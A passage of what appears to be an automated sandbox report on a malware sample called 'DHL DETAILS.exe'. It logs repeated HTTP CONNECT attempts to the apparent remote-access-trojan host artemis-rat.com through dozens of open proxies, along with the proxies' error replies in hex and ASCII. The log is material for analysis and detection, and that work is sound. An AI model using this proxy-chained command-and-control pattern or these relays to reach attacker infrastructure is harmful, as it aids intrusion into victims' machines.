                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1676192.168.2.555080114.156.77.10780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.333472013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1677192.168.2.555029138.36.150.1510806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.333517075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1678192.168.2.55508594.131.106.20831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.334552050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.177052021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.176933050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.067600965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.676909924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1679192.168.2.55507494.16.112.22393536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.334928989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1680192.168.2.5550958.217.44.229156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.335175037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1681192.168.2.555043185.101.16.52806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.335652113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1682192.168.2.555039103.118.46.17780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.338114023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1683192.168.2.555071161.97.74.176300006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.338114977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.652225018 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                    Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1684192.168.2.55505243.155.170.35156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.338224888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1685192.168.2.550457122.185.183.19480806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.338351011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1686192.168.2.55507791.189.177.18831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.338351011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.658817053 CET1286INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/5.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3628
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from lb1
                                                                                    X-Cache-Lookup: NONE from lb1:3128
                                                                                    Via: 1.1 lb1 (squid/5.7)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1687192.168.2.555163162.159.242.252806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.339761019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.507213116 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1688192.168.2.55519038.162.3.7431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.343476057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.760405064 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1689192.168.2.555068139.224.64.19180816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.397627115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.744771004 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1690192.168.2.554633123.56.1.5031296352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.401756048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.726852894 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1691192.168.2.555067222.174.178.12249996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.402364969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.177158117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1692192.168.2.550658181.212.136.34489936352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
